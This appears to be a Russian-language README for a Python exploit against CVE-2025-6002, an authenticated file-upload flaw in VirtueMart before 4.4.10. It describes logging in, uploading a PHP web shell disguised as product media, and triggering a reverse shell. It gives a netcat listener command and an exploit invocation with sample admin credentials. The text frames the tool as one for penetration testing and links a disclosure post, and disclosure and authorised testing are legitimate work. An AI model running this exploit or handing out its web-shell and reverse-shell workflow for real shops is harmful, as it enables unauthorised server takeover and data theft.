
Эксплойт на Python для CVE-2025-6002, нацеленный на аутентифицированную произвольную загрузку файлов в VirtueMart < 4.4.10. Выполняет вход, загружает PHP-веб-шелл и запускает обратную оболочку для тестирования на проникновение.
Этот скрипт эксплуатирует уязвимость произвольной загрузки файлов с аутентификацией в VirtueMart < 4.4.10 (CVE-2025-6002), описанную в этом посте блога: https://blog.blacklanternsecurity.com/p/doomla-zero-days
Скрипт входит в VirtueMart с предоставленными учетными данными, создает новый товар и загружает PHP-вебшелл как медиафайл. Затем он запускает обратную оболочку на указанный IP/порт.
Параметры:
Использование:
nc -nlvp 1337
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337